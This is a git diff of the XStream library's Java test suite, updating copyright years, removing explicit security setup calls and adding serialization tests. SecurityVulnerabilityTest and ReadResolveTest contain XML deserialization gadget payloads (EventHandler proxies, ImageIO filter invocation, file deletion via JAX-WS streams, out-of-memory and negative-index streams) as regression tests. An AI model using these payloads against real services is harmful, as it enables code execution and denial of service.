+++ b/xstream/src/test/com/thoughtworks/acceptance/MultipleObjectsInOneStreamTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005, 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2009, 2018 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2009, 2018, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -22,8 +22,8 @@ import com.thoughtworks.xstream.core.ReferenceByIdUnmarshaller;
import com.thoughtworks.xstream.io.HierarchicalStreamReader;
import com.thoughtworks.xstream.io.HierarchicalStreamWriter;
import com.thoughtworks.xstream.io.ReaderWrapper;
+import com.thoughtworks.xstream.io.xml.MXParserDriver;
import com.thoughtworks.xstream.io.xml.PrettyPrintWriter;
-import com.thoughtworks.xstream.io.xml.Xpp3Driver;
import com.thoughtworks.xstream.io.xml.XppReader;
import com.thoughtworks.xstream.mapper.Mapper;
import com.thoughtworks.xstream.testutil.CallLog;
@@ -216,7 +216,7 @@ public class MultipleObjectsInOneStreamTest extends AbstractAcceptanceTest {
+ " <string>bottom</string>\n"
+ "</object-stream>";
- final LevelTrackingReader reader = new LevelTrackingReader(new Xpp3Driver().createReader(new StringReader(xml)));
+ final LevelTrackingReader reader = new LevelTrackingReader(new MXParserDriver().createReader(new StringReader(xml)));
final ObjectInputStream ois = xstream.createObjectInputStream(reader);
final int level = reader.getLevel();
assertEquals("top", ois.readObject());
diff --git a/xstream/src/test/com/thoughtworks/acceptance/ReadResolveTest.java b/xstream/src/test/com/thoughtworks/acceptance/ReadResolveTest.java
index f8c52133510f187211386e3e3c1c062f615d800b..14fd9b02ead3c65b9aef8169d6a74f1a4c2da6dd 100644
--- a/xstream/src/test/com/thoughtworks/acceptance/ReadResolveTest.java
+++ b/xstream/src/test/com/thoughtworks/acceptance/ReadResolveTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2004, 2005 Joe Walnes.
- * Copyright (C) 2006, 2007 XStream Committers.
+ * Copyright (C) 2006, 2007, 2014, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -18,6 +18,10 @@ import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
+import java.io.Serializable;
+
+import com.thoughtworks.xstream.converters.ConversionException;
+import com.thoughtworks.xstream.core.JVM;
/**
* @author Chris Kelly
@@ -52,4 +56,56 @@ public class ReadResolveTest extends AbstractAcceptanceTest {
assertSame(status, rStatus);
}
+
+ public static class ResolveToNull implements Serializable {
+ private static final long serialVersionUID = 201412L;
+ final String name;
+
+ public ResolveToNull(final String name) {
+ this.name = name;
+ }
+
+ private Object readResolve() {
+ return null;
+ }
+ }
+
+ public void testResolveToNull() throws IOException, ClassNotFoundException {
+ final ResolveToNull obj = new ResolveToNull("test");
+
+ final ByteArrayOutputStream bout = new ByteArrayOutputStream();
+ final ObjectOutputStream os = new ObjectOutputStream(bout);
+ os.writeObject(obj);
+
+ final byte[] bArray = bout.toByteArray();
+ ObjectInputStream in = null;
+ final ByteArrayInputStream bin = new ByteArrayInputStream(bArray);
+ in = new ObjectInputStream(bin);
+ assertNull(in.readObject());
+
+ xstream.alias("toNull", ResolveToNull.class);
+ assertNull(xstream.fromXML("<toNull><name>test</name></toNull>"));
+ }
+
+ public void testOutOfMemoryInReadObject() {
+ if (JVM.isVersion(5)) {
+ final String xml = ""
+ + "<java.util.PriorityQueue serialization='custom'>\n"
+ + " <unserializable-parents/>\n"
+ + " <java.util.PriorityQueue>\n"
+ + " <default>\n"
+ + " <size>2147483647</size>\n"
+ + " </default>\n"
+ + " <int>2</int>\n"
+ + " </java.util.PriorityQueue>\n"
+ + "</java.util.PriorityQueue>";
+
+ try {
+ xstream.fromXML(xml);
+ fail("Thrown " + ConversionException.class.getName() + " expected");
+ } catch (final ConversionException e) {
+ // OK
+ }
+ }
+ }
}
diff --git a/xstream/src/test/com/thoughtworks/acceptance/SecurityManagerTest.java b/xstream/src/test/com/thoughtworks/acceptance/SecurityManagerTest.java
index 2e6631334b539828bdec6380c5226351bdb2edec..f9b878aeff7a4a5121ec0f6d87576ee4d8eaf9e3 100644
--- a/xstream/src/test/com/thoughtworks/acceptance/SecurityManagerTest.java
+++ b/xstream/src/test/com/thoughtworks/acceptance/SecurityManagerTest.java
@@ -205,7 +205,6 @@ public class SecurityManagerTest extends TestCase {
}
private void assertBothWays() {
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypesByWildcard(new String[] {"com.thoughtworks.acceptance.objects.*"});
xstream.alias("software", Software.class);
diff --git a/xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java b/xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java
index da5f861ef08e6aa7689f810df74fc8e7726d3c62..09b96a8d011a2d26365da856654953b5146e6533 100644
--- a/xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java
+++ b/xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2013, 2014, 2017, 2018, 2020 XStream Committers.
+ * Copyright (C) 2013, 2014, 2017, 2018, 2020, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -11,6 +11,7 @@
package com.thoughtworks.acceptance;
import java.beans.EventHandler;
+import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
@@ -18,12 +19,12 @@ import java.io.InputStream;
import java.io.OutputStream;
import java.util.Iterator;
-import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.converters.ConversionException;
import com.thoughtworks.xstream.core.JVM;
import com.thoughtworks.xstream.security.AnyTypePermission;
import com.thoughtworks.xstream.security.ForbiddenClassException;
+import com.thoughtworks.xstream.security.ProxyTypePermission;
/**
@@ -37,9 +38,8 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest {
super.setUp();
BUFFER.setLength(0);
xstream.alias("runnable", Runnable.class);
- }
-
- protected void setupSecurity(XStream xstream) {
+ xstream.allowTypeHierarchy(Runnable.class);
+ xstream.addPermission(ProxyTypePermission.PROXIES);
}
public void testCannotInjectEventHandler() {
@@ -63,28 +63,6 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest {
assertEquals(0, BUFFER.length());
}
- public void testCannotInjectEventHandlerWithUnconfiguredSecurityFramework() {
- xstream.alias("runnable", Runnable.class);
- final String xml = ""
- + "<string class='runnable-array'>\n"
- + " <dynamic-proxy>\n"
- + " <interface>java.lang.Runnable</interface>\n"
- + " <handler class='java.beans.EventHandler'>\n"
- + " <target class='com.thoughtworks.acceptance.SecurityVulnerabilityTest$Exec'/>\n"
- + " <action>exec</action>\n"
- + " </handler>\n"
- + " </dynamic-proxy>\n"
- + "</string>";
-
- try {
- xstream.fromXML(xml);
- fail("Thrown " + XStreamException.class.getName() + " expected");
- } catch (final XStreamException e) {
- assertTrue(e.getMessage().indexOf(EventHandler.class.getName()) >= 0);
- }
- assertEquals(0, BUFFER.length());
- }
-
public void testExplicitlyConvertEventHandler() {
final String xml = ""
+ "<string class='runnable-array'>\n"
@@ -105,39 +83,6 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest {
assertEquals("Executed!", BUFFER.toString());
}
- public void testCannotInjectConvertImageIOContainsFilterWithUnconfiguredSecurityFramework() {
- if (JVM.isVersion(7)) {
- final String xml = ""
- + "<string class='javax.imageio.spi.FilterIterator'>\n"
- + " <iter class='java.util.ArrayList$Itr'>\n"
- + " <cursor>0</cursor>\n"
- + " <lastRet>1</lastRet>\n"
- + " <expectedModCount>1</expectedModCount>\n"
- + " <outer-class>\n"
- + " <com.thoughtworks.acceptance.SecurityVulnerabilityTest_-Exec/>\n"
- + " </outer-class>\n"
- + " </iter>\n"
- + " <filter class='javax.imageio.ImageIO$ContainsFilter'>\n"
- + " <method>\n"
- + " <class>com.thoughtworks.acceptance.SecurityVulnerabilityTest$Exec</class>\n"
- + " <name>exec</name>\n"
- + " <parameter-types/>\n"
- + " </method>\n"
- + " <name>exec</name>\n"
- + " </filter>\n"
- + " <next/>\n"
- + "</string>";
-
- try {
- xstream.fromXML(xml);
- fail("Thrown " + XStreamException.class.getName() + " expected");
- } catch (final XStreamException e) {
- assertTrue(e.getMessage().indexOf("javax.imageio.ImageIO$ContainsFilter") >= 0);
- }
- assertEquals(0, BUFFER.length());
- }
- }
-
public void testExplicitlyConvertImageIOContainsFilter() {
if (JVM.isVersion(7)) {
final String xml = ""
@@ -162,6 +107,7 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest {
+ "</string>";
xstream.allowTypes(new String[]{"javax.imageio.ImageIO$ContainsFilter"});
+ xstream.allowTypeHierarchy(Iterator.class);
final Iterator iterator = (Iterator)xstream.fromXML(xml);
assertEquals(0, BUFFER.length());
@@ -181,8 +127,8 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest {
try {
xstream.fromXML("<void/>");
fail("Thrown " + ConversionException.class.getName() + " expected");
- } catch (final ConversionException e) {
- assertEquals("void", e.get("construction-type"));
+ } catch (final ForbiddenClassException e) {
+ // OK
}
}
@@ -207,23 +153,11 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest {
}
}
- public static class LazyIterator {}
-
- public void testInstanceOfLazyIterator() {
- xstream.alias("lazy-iterator", LazyIterator.class);
- try {
- xstream.fromXML("<lazy-iterator/>");
- fail("Thrown " + ForbiddenClassException.class.getName() + " expected");
- } catch (final ForbiddenClassException e) {
- // OK
- }
- }
-
public void testCannotUseJaxwsInputStreamToDeleteFile() {
if (JVM.isVersion(5)) {
final String xml = ""
+ "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n"
- + " <tempFile>target/junit/test.txt</tempFile>\n"
+ + " <tempFile>target/junit/test.txt</tempFile>\n"
+ "</is>";
xstream.aliasType("is", InputStream.class);
@@ -252,7 +186,7 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest {
final String xml = ""
+ "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n"
- + " <tempFile>target/junit/test.txt</tempFile>\n"
+ + " <tempFile>target/junit/test.txt</tempFile>\n"
+ "</is>";
xstream.addPermission(AnyTypePermission.ANY); // clear out defaults
@@ -282,4 +216,49 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest {
}
}
}
+
+ public void testCannotInjectManipulatedByteArryInputStream() {
+ xstream.alias("bais", ByteArrayInputStream.class);
+ final String xml = ""
+ + "<bais>\n"
+ + " <buf></buf>\n"
+ + " <pos>-2147483648</pos>\n"
+ + " <mark>0</mark>\n"
+ + " <count>0</count>\n"
+ + "</bais>";
+
+ try {
+ xstream.fromXML(xml);
+ fail("Thrown " + ForbiddenClassException.class.getName() + " expected");
+ } catch (final ForbiddenClassException e) {
+ assertEquals(e.getMessage(),ByteArrayInputStream.class.getName());
+ }
+ }
+
+ public void testExplicitlyUnmarshalEndlessByteArryInputStream() {
+ xstream.alias("bais", ByteArrayInputStream.class);
+ xstream.allowTypes(new Class[]{ByteArrayInputStream.class});
+
+ final String xml = ""
+ + "<bais>\n"
+ + " <buf></buf>\n"
+ + " <pos>-2147483648</pos>\n"
+ + " <mark>0</mark>\n"
+ + " <count>0</count>\n"
+ + "</bais>";
+
+ final byte[] data = new byte[10];
+ final ByteArrayInputStream bais = (ByteArrayInputStream)xstream.fromXML(xml);
+ int i = 5;
+ try {
+ while(bais.read(data, 0, 10) == 0) {
+ if (--i == 0) {
+ break;
+ }
+ }
+ assertEquals("Unlimited reads of ByteArrayInputStream returning 0 bytes expected", 0, i);
+ } catch(ArrayIndexOutOfBoundsException e) {
+ assertEquals("ArrayIndexOutOfBoundsException expected reading invalid stream", 5, i);
+ }
+ }
}
diff --git a/xstream/src/test/com/thoughtworks/acceptance/SerializationCallbackOrderTest.java b/xstream/src/test/com/thoughtworks/acceptance/SerializationCallbackOrderTest.java
index c8db4cdcfb0d7e930c22271f4ef07f23a676b280..4e229d94f9640d531c6ccde2fe180fa89f74b569 100644
--- a/xstream/src/test/com/thoughtworks/acceptance/SerializationCallbackOrderTest.java
+++ b/xstream/src/test/com/thoughtworks/acceptance/SerializationCallbackOrderTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2014 XStream Committers.
+ * Copyright (C) 2006, 2007, 2014, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -11,6 +11,8 @@
*/
package com.thoughtworks.acceptance;
+import com.thoughtworks.xstream.converters.reflection.PureJavaReflectionProvider;
+import com.thoughtworks.xstream.converters.reflection.SerializableConverter;
import com.thoughtworks.xstream.testutil.CallLog;
import java.io.ByteArrayInputStream;
@@ -229,6 +231,72 @@ public class SerializationCallbackOrderTest extends AbstractAcceptanceTest {
}
}
+ public static class UnserializableBase {
+ protected UnserializableBase() {
+ log.actual("UnserializableBase.UnserializableBase()");
+ }
+ }
+
+ public static class ChildUnserializableBase extends UnserializableBase implements Serializable {
+ /*
+ private ChildUnserializableBase() {
+ log.actual("ChildUnserializableBase.ChildUnserializableBase()");
+ }
+ */
+
+ public ChildUnserializableBase(String s) {
+ log.actual("ChildUnserializableBase.ChildUnserializableBase(String)");
+ }
+
+ private void writeObject(ObjectOutputStream out) throws IOException {
+ log.actual("ChildUnserializableBase.writeObject() start");
+ out.defaultWriteObject();
+ log.actual("ChildUnserializableBase.writeObject() end");
+ }
+
+ private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
+ log.actual("ChildUnserializableBase.readObject() start");
+ in.defaultReadObject();
+ log.actual("ChildUnserializableBase.readObject() end");
+ }
+ }
+
+ public static class ChildUnserializableBaseRR extends ChildUnserializableBase {
+ private ChildUnserializableBaseRR() {
+ super("");
+ log.actual("ChildUnserializableBaseRR.ChildUnserializableBaseRR()");
+ }
+
+ public ChildUnserializableBaseRR(String s) {
+ super(s);
+ log.actual("ChildUnserializableBaseRR.ChildUnserializableBaseRR(String)");
+ }
+
+ private void writeObject(ObjectOutputStream out) throws IOException {
+ log.actual("ChildUnserializableBaseRR.writeObject() start");
+ out.defaultWriteObject();
+ out.writeInt(42);
+ log.actual("ChildUnserializableBaseRR.writeObject() end");
+ }
+
+ private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
+ log.actual("ChildUnserializableBaseRR.readObject() start");
+ in.defaultReadObject();
+ in.readInt();
+ log.actual("ChildUnserializableBaseRR.readObject() end");
+ }
+
+ Object writeReplace() {
+ log.actual("ChildUnserializableBaseRR.writeReplace()");
+ return this;
+ }
+
+ Object readResolve() {
+ log.actual("ChildUnserializableBaseRR.readResolve()");
+ return this;
+ }
+ }
+
// --- Convenience wrappers around Java Object Serialization
private byte[] javaSerialize(Object object) throws IOException {
@@ -335,6 +403,39 @@ public class SerializationCallbackOrderTest extends AbstractAcceptanceTest {
log.verify();
}
+ public void testJavaSerializationUnserializableBase() throws IOException {
+ final Serializable object = new ChildUnserializableBase("");
+ log.reset();
+
+ // expectations
+ log.expect("ChildUnserializableBase.writeObject() start");
+ log.expect("ChildUnserializableBase.writeObject() end");
+
+ // execute
+ javaSerialize(object);
+
+ // verify
+ log.verify();
+ }
+
+ public void testJavaSerializationUnserializableBaseRR() throws IOException {
+ final Serializable object = new ChildUnserializableBaseRR("");
+ log.reset();
+
+ // expectations
+ log.expect("ChildUnserializableBaseRR.writeReplace()");
+ log.expect("ChildUnserializableBase.writeObject() start");
+ log.expect("ChildUnserializableBase.writeObject() end");
+ log.expect("ChildUnserializableBaseRR.writeObject() start");
+ log.expect("ChildUnserializableBaseRR.writeObject() end");
+
+ // execute
+ javaSerialize(object);
+
+ // verify
+ log.verify();
+ }
+
public void testXStreamSerializationOwnPrivateRR() {
// expectations
log.expect("PrivateChildOwnRR.writeReplace()");
@@ -424,6 +525,39 @@ public class SerializationCallbackOrderTest extends AbstractAcceptanceTest {
log.verify();
}
+ public void testXStreamSerializationUnserializableBase() throws IOException {
+ final Serializable object = new ChildUnserializableBase("");
+ log.reset();
+
+ // expectations
+ log.expect("ChildUnserializableBase.writeObject() start");
+ log.expect("ChildUnserializableBase.writeObject() end");
+
+ // execute
+ xstream.toXML(object);
+
+ // verify
+ log.verify();
+ }
+
+ public void testXStreamSerializationUnserializableBaseRR() throws IOException {
+ final Serializable object = new ChildUnserializableBaseRR("");
+ log.reset();
+
+ // expectations
+ log.expect("ChildUnserializableBaseRR.writeReplace()");
+ log.expect("ChildUnserializableBase.writeObject() start");
+ log.expect("ChildUnserializableBase.writeObject() end");
+ log.expect("ChildUnserializableBaseRR.writeObject() start");
+ log.expect("ChildUnserializableBaseRR.writeObject() end");
+
+ // execute
+ xstream.toXML(object);
+
+ // verify
+ log.verify();
+ }
+
public void testJavaDeserializationOwnPrivateRR() throws IOException, ClassNotFoundException {
// setup
byte[] data = javaSerialize(new PrivateChildOwnRR());
@@ -537,6 +671,43 @@ public class SerializationCallbackOrderTest extends AbstractAcceptanceTest {
log.verify();
}
+ public void testJavaDeserializationUnserializableBase() throws IOException, ClassNotFoundException {
+ // setup
+ byte[] data = javaSerialize(new ChildUnserializableBase(""));
+ log.reset();
+
+ // expectations
+ log.expect("UnserializableBase.UnserializableBase()");
+ log.expect("ChildUnserializableBase.readObject() start");
+ log.expect("ChildUnserializableBase.readObject() end");
+
+ // execute
+ javaDeserialize(data);
+
+ // verify
+ log.verify();
+ }
+
+ public void testJavaDeserializationUnserializableBaseRR() throws IOException, ClassNotFoundException {
+ // setup
+ byte[] data = javaSerialize(new ChildUnserializableBaseRR(""));
+ log.reset();
+
+ // expectations
+ log.expect("UnserializableBase.UnserializableBase()");
+ log.expect("ChildUnserializableBase.readObject() start");
+ log.expect("ChildUnserializableBase.readObject() end");
+ log.expect("ChildUnserializableBaseRR.readObject() start");
+ log.expect("ChildUnserializableBaseRR.readObject() end");
+ log.expect("ChildUnserializableBaseRR.readResolve()");
+
+ // execute
+ javaDeserialize(data);
+
+ // verify
+ log.verify();
+ }
+
public void testXStreamDeserializationOwnPrivateRR() {
// setup
String data = xstream.toXML(new PrivateChildOwnRR());
@@ -650,6 +821,98 @@ public class SerializationCallbackOrderTest extends AbstractAcceptanceTest {
log.verify();
}
+ public void testXStreamDeserializationUnserializableBaseUnsafe() throws IOException, ClassNotFoundException {
+ // Use Java deserialization for Serializables with unserializable parent, but no readResolve
+
+ // setup
+ String data = xstream.toXML(new ChildUnserializableBase(""));
+ log.reset();
+
+ // expectations
+ // log.expect("UnserializableBase.UnserializableBase()"); // XStream cannot call ctor of parent only
+ log.expect("ChildUnserializableBase.readObject() start");
+ log.expect("ChildUnserializableBase.readObject() end");
+
+ // execute
+ xstream.fromXML(data);
+
+ // verify
+ log.verify();
+ }
+
+ public void testXStreamDeserializationUnserializableBasePure() throws IOException, ClassNotFoundException {
+ // Use Java deserialization for Serializables with unserializable parent, but no readResolve
+
+ // setup
+ xstream.registerConverter(new SerializableConverter(xstream.getMapper(), new PureJavaReflectionProvider(),
+ xstream.getClassLoaderReference()) {
+ public boolean canConvert(Class type) {
+ return type == ChildUnserializableBase.class;
+ }
+ });
+ String data = xstream.toXML(new ChildUnserializableBase(""));
+ log.reset();
+
+ // expectations
+ log.expect("UnserializableBase.UnserializableBase()");
+ log.expect("ChildUnserializableBase.readObject() start");
+ log.expect("ChildUnserializableBase.readObject() end");
+
+ // execute
+ xstream.fromXML(data);
+
+ // verify
+ log.verify();
+ }
+
+ public void testXStreamDeserializationUnserializableBaseRRUnsafe() throws IOException, ClassNotFoundException {
+ // setup
+ String data = xstream.toXML(new ChildUnserializableBaseRR(""));
+ log.reset();
+
+ // expectations
+ // log.expect("UnserializableBase.UnserializableBase()"); // XStream cannot call ctor of parent only
+ log.expect("ChildUnserializableBase.readObject() start");
+ log.expect("ChildUnserializableBase.readObject() end");
+ log.expect("ChildUnserializableBaseRR.readObject() start");
+ log.expect("ChildUnserializableBaseRR.readObject() end");
+ log.expect("ChildUnserializableBaseRR.readResolve()");
+
+ // execute
+ xstream.fromXML(data);
+
+ // verify
+ log.verify();
+ }
+
+ public void testXStreamDeserializationUnserializableBaseRRPure() throws IOException, ClassNotFoundException {
+ // setup
+ xstream.registerConverter(new SerializableConverter(xstream.getMapper(), new PureJavaReflectionProvider(),
+ xstream.getClassLoaderReference()) {
+ public boolean canConvert(Class type) {
+ return type == ChildUnserializableBaseRR.class;
+ }
+ });
+ String data = xstream.toXML(new ChildUnserializableBaseRR(""));
+ log.reset();
+
+ // expectations
+ log.expect("UnserializableBase.UnserializableBase()");
+ log.expect("ChildUnserializableBase.ChildUnserializableBase(String)"); // XStream cannot call ctor of parent only
+ log.expect("ChildUnserializableBaseRR.ChildUnserializableBaseRR()"); // XStream cannot call ctor of parent only
+ log.expect("ChildUnserializableBase.readObject() start");
+ log.expect("ChildUnserializableBase.readObject() end");
+ log.expect("ChildUnserializableBaseRR.readObject() start");
+ log.expect("ChildUnserializableBaseRR.readObject() end");
+ log.expect("ChildUnserializableBaseRR.readResolve()");
+
+ // execute
+ xstream.fromXML(data);
+
+ // verify
+ log.verify();
+ }
+
public static class ParentNotTransient implements Serializable {
public int somethingNotTransient;
diff --git a/xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java b/xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java
index 130c63515990082e72dd59852c2693f9f78fff8f..8a02dc3540a78faa5daeda92480731b0ce528dcc 100644
--- a/xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java
+++ b/xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2011, 2017, 2019, 2020 XStream Committers.
+ * Copyright (C) 2006, 2007, 2011, 2017, 2019, 2020, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -294,7 +294,7 @@ public class XmlFriendlyTest extends AbstractAcceptanceTest {
+ " </default>\n"
+ " </java.text.DecimalFormatSymbols>\n"
+ "</java.text.DecimalFormatSymbols>";
- } else {
+ } else if (!JVM.isVersion(16)) {
xml = ""
+ "<java.text.DecimalFormatSymbols serialization=\"custom\">\n"
+ " <java.text.DecimalFormatSymbols>\n"
@@ -324,6 +324,35 @@ public class XmlFriendlyTest extends AbstractAcceptanceTest {
+ " </default>\n"
+ " </java.text.DecimalFormatSymbols>\n"
+ "</java.text.DecimalFormatSymbols>";
+ } else {
+ xml = ""
+ + "<java.text.DecimalFormatSymbols serialization=\"custom\">\n"
+ + " <java.text.DecimalFormatSymbols>\n"
+ + " <default>\n"
+ + " <decimalSeparator>,</decimalSeparator>\n"
+ + " <digit>#</digit>\n"
+ + " <exponential>E</exponential>\n"
+ + " <groupingSeparator>.</groupingSeparator>\n"
+ + " <minusSign>-</minusSign>\n"
+ + " <monetaryGroupingSeparator>.</monetaryGroupingSeparator>\n"
+ + " <monetarySeparator>,</monetarySeparator>\n"
+ + " <patternSeparator>;</patternSeparator>\n"
+ + " <perMill>\u2030</perMill>\n"
+ + " <percent>%</percent>\n"
+ + " <serialVersionOnStream>5</serialVersionOnStream>\n"
+ + " <zeroDigit>0</zeroDigit>\n"
+ + " <NaN>NaN</NaN>\n"
+ + " <currencySymbol>\u20ac</currencySymbol>\n"
+ + " <exponentialSeparator>E</exponentialSeparator>\n"
+ + " <infinity>\u221e</infinity>\n"
+ + " <intlCurrencySymbol>EUR</intlCurrencySymbol>\n"
+ + " <locale>de_DE</locale>\n"
+ + " <minusSignText>-</minusSignText>\n"
+ + " <perMillText>\u2030</perMillText>\n"
+ + " <percentText>%</percentText>\n"
+ + " </default>\n"
+ + " </java.text.DecimalFormatSymbols>\n"
+ + "</java.text.DecimalFormatSymbols>";
}
final DecimalFormatSymbols format = new DecimalFormatSymbols(Locale.GERMANY);
format.setNaN("NaN");
diff --git a/xstream/src/test/com/thoughtworks/acceptance/annotations/XStream12AnnotationCompatibilityTest.java b/xstream/src/test/com/thoughtworks/acceptance/annotations/XStream12AnnotationCompatibilityTest.java
index fde33dc574801bbd125ec1fc68061562b0c1c97a..2bb5988bde406c65e2e511ab26c4b524dcbddb26 100644
--- a/xstream/src/test/com/thoughtworks/acceptance/annotations/XStream12AnnotationCompatibilityTest.java
+++ b/xstream/src/test/com/thoughtworks/acceptance/annotations/XStream12AnnotationCompatibilityTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2007, 2017 XStream Committers.
+ * Copyright (C) 2007, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -27,7 +27,6 @@ public class XStream12AnnotationCompatibilityTest extends AbstractAcceptanceTest
protected void setUp() throws Exception {
super.setUp();
xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypes(new Class[]{
FieldConverterTest.TaskWithAnnotations.class, ImplicitCollectionTest.ImplicitRootOne.class});
xstream.registerConverter(new AnnotationReflectionConverter(xstream.getMapper(), xstream
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumConverterTest.java
index 573eb256e3d5d92578a1392991d0963a7ed4f7f1..d169979d45ddab161fb78c053c532f7f33522370 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumConverterTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -30,7 +30,6 @@ public class EnumConverterTest extends TestCase {
protected void setUp() throws Exception {
super.setUp();
xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
xstream.alias("simple", SimpleEnum.class);
xstream.alias("polymorphic", PolymorphicEnum.class);
}
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumCustomConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumCustomConverterTest.java
index 34d1a2eea8655ca805f41343c0d939ad245722df..458be400d97dfeb8d4e036cf4a86f1ef9cbf4661 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumCustomConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumCustomConverterTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2008, 2017 XStream Committers.
+ * Copyright (C) 2008, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -30,7 +30,6 @@ public class EnumCustomConverterTest extends TestCase {
protected void setUp() throws Exception {
super.setUp();
xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypes(new Class[] {TypeWithEnums.class});
xstream.alias("simple", SimpleEnum.class);
xstream.alias("polymorphic", PolymorphicEnum.class);
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapConverterTest.java
index c156a2033bd5045bdfb4f76632fddf0ff6161958..d1dbef3a8a1b1427e3c1d3e469b4649f1f18d15b 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapConverterTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -24,7 +24,6 @@ public class EnumMapConverterTest extends TestCase {
protected void setUp() throws Exception {
super.setUp();
xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
}
public void testIncludesEnumTypeInSerializedForm() {
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapperTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapperTest.java
index fe0f8d2c81890f1778d0c602b92dcc12733cec89..1ad07b544ac815a847f2368b0ecfcec64a59c0b0 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapperTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapperTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2008, 2017 XStream Committers.
+ * Copyright (C) 2008, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -34,7 +34,6 @@ public class EnumMapperTest extends TestCase {
protected void setUp() throws Exception {
super.setUp();
xstream = new XStream();
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypesByWildcard(new String[] {getClass().getName()+"$*"});
xstream.alias("simple", SimpleEnum.class);
xstream.alias("polymorphic", PolymorphicEnum.class);
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumSetConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumSetConverterTest.java
index 193bccf96813847e1c8302c0483dc7864c4028b3..3f483d990acf73b0b76f6c80ae751dc4ca9db578 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumSetConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumSetConverterTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2013, 2017 XStream Committers.
